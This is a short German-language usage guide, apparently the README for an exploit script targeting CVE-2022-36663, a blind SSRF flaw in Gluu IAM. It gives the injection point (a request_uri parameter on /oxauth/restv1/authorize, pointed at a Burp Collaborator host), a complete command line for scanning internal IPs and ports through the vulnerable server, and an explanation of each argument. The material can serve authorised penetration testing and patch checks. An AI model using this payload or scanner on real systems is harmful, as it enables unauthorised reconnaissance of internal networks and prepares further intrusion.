
Interner Netzwerk-Scanner durch Gluu IAM blind ssrf
Interner Netzwerkscanner durch blindes SSRF in Gluu IAM
Gluu IAM ist anfällig für blindes SSRF, das ausgenutzt werden kann, um das interne Netzwerk auf offene Ports zu scannen, basierend auf Antwortzeiten.
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
Um zu prüfen, ob das Ziel verwundbar ist, fügen Sie &request_uri=http://burpcollab zur Anfrage /oxauth/restv1/authorize hinzu und beobachten Sie eingehenden Datenverkehr vom Zielserver.
python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='
Url - Die URL des Gluu IAM Servers
IP - Die interne IP-Adresse oder das Subnetz, das Sie scannen möchten
Port - Der interne Port, den Sie scannen möchten
AR - Die Authorisierungsanfrage-URL, die mit einer leeren request_uri endet
